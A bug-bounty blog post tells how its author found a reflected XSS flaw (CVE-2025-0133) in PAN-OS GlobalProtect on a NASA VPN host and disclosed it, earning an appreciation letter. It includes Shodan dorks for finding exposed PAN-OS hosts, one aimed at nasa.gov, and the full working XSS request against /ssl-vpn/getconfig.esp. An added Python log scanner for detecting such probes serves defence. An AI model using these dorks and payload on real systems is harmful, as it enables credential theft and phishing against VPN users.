🌌 Introduction

Bug hunting is unpredictable. Sometimes you find a bug in 5 minutes… sometimes you spend 5 days with nothing. And sometimes, you find a bug at midnight, lying on your bed, staring at the ceiling wondering what your life is.

That's exactly how this story begins.

This is the journey of how I discovered a real-world vulnerability, CVE-2025-0133, on a major space agency system (target redacted for safety). And yes… I received an official Appreciation Letter, which is now proudly framed on my wall.

🛡️ About CVE-2025-0133

  • Type: Reflected Cross-Site Scripting (XSS)
  • Component: Palo Alto Networks PAN-OS GlobalProtect
  • Severity: Medium

🔍 What this vulnerability allows

Because of improper sanitization, an attacker can craft a link that causes the browser of an authenticated Captive Portal user to execute malicious JavaScript. This can lead to:

  • Credential theft
  • Phishing attacks
  • Clientless VPN compromise

A simple reflected XSS — but on a very sensitive system.

🌙 The Late-Night Spark

  • Time: 11:00 PM
  • Mood: Mentally offline
  • Brain: "Come on, Ajay… go hunt on NASA. This time I'm not getting up without a bug!"

Earlier, I had tried hunting on the same program but only received:

  • ❌ Duplicates
  • ❌ Informative
  • ❌ Not applicable

But that night, I looked at my empty wall and thought:

"Man… if a NASA Appreciation Letter got framed right here… life sorted!" 😭❤️

So I opened my laptop again, switched on my playlist, and started hunting.

🎧 Music ON → Talwinder Mashup → Focus Mode Activated

I opened Shodan and started experimenting with multiple dorks. Nothing useful.

Then a spark hit me:

"Hey… CVE-2025-0133! I have already made a full YouTube video on this!"

That instantly refreshed the entire exploit logic in my mind. So I used the basic PAN-OS dork:

cpe:"cpe:2.3:o:paloaltonetworks:pan-os"

Good results. Then I customized it for NASA systems:

cpe:"cpe:2.3:o:paloaltonetworks:pan-os" hostname:"nasa.gov"

I got 11 results. Excitement UP. Confidence DOWN (I was a little scared too 😅).

I tried 5–6 hosts. Nothing worked. I almost closed the laptop.

But suddenly my inner bug hunter whispered:

"Bro, just check the last 3 targets… maybe that's where the magic is."

And that changed everything.

💥 The Breakthrough on IP *.*2.**5.208

One result showed:

https://*.*2.**5.208/global-protect/login.esp

I replaced the path with the vulnerable endpoint:

🔥 Vulnerable Endpoint

/ssl-vpn/getconfig.esp

🎯 Payload I used

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22CyberTechAjju%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer

Hit Enter…

💥 XSS POPPED! The prompt executed with my custom message "CyberTechAjju."

At this moment, my reaction was literally:

"Whoa, I actually found it!"

But wait — this was the IP. I still needed to verify it on the original domain.

🌐 Testing on the Actual Domain

I replaced the IP with the real redacted domain: vpn.*.*.nasa.gov

Used the same endpoint. Same payload. Reloaded…

🔥 BOOM AGAIN! VALID XSS!

This was it. Fully reproducible. Fully valid. Fully responsible-disclosure worthy.
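
For defenders, the request pattern described above is easy to spot in gateway or reverse-proxy access logs. The following is an added example, not part of the original post or any vendor tooling: it flags requests to /ssl-vpn/getconfig.esp whose query parameters decode to markup, including double-encoded values. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/ssl-vpn/getconfig.esp"  # endpoint named in the write-up
# Assumption: access logs use the common/combined log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
# Assumption: legitimate parameter values on this endpoint never contain these.
MARKUP_RE = re.compile(r'[<>"]|javascript:', re.I)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return names of query parameters on ENDPOINT whose decoded value has markup."""
    parts = urlsplit(url)
    if parts.path.lower() != ENDPOINT:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    return sorted(name for name, values in params.items()
                  if any(MARKUP_RE.search(fully_decode(v)) for v in values))

def scan(lines):
    """Yield (client_ip, flagged_params) for each log line that looks like a probe."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            flagged = suspicious_params(m.group(2))
            if flagged:
                yield m.group(1), flagged

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&user=alice&domain=%28empty_domain%29 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /ssl-vpn/getconfig.esp?client-type=1&user=%3Csvg%3E%3Cscript%3Eprompt%281%29%3C%2Fscript%3E%3C%2Fsvg%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [01/Jan/2025:10:00:09 +0000] "GET /ssl-vpn/getconfig.esp?user=%253Csvg%253E HTTP/1.1" 200 600',
    '198.51.100.7 - - [01/Jan/2025:10:01:00 +0000] "GET /global-protect/login.esp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, params)
```
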


📨 Submitting the Report

I immediately submitted my findings through the official Bugcrowd VDP around 2:00 AM. Then finally slept.

The next evening, the email came:

"Your submission has been triaged."

  • Confidence level = +1000
  • Energy level = +500
  • Sleep level = 0 😂

But the real moment came on 16 October:

"Please accept this letter as a token of our appreciation…"

An official Appreciation Letter PDF. Yes — from NASA.

I got it printed the same day, visited a carpenter, and said:

"Uncle, please give me a really nice frame."

Paid ₹300 without bargaining (rare moment 😂). And the next morning…

📌 NASA's Appreciation Letter was hanging proudly on my wall.

Dream achieved.


🔗 Want to Understand the CVE?

I already created a detailed YouTube video on CVE-2025-0133. Watch it here:

👉 https://youtu.be/s_8oj1hWLU0?si=2W04GeHnIft2bkqY

💡 Key Takeaways

  • Never underestimate a midnight thought.
  • Always check that "last 3 targets."
  • Your playlist can save your bug hunting career.
  • Persistence beats luck.
  • Shodan + CVE knowledge = 🔥 combinations.
  • Even the biggest organizations can be vulnerable.

🔥 Final Words

Bug hunting is not just about skills — it's about mindset, consistency, and passion. And if you're reading this, remember:

"Keep Learning, Keep Hacking." — CyberTechAjju

Your achievement wall may be empty today, but one valid bug report can turn it into a story of pride.

Keep pushing. Your NASA moment is waiting. 🚀❤️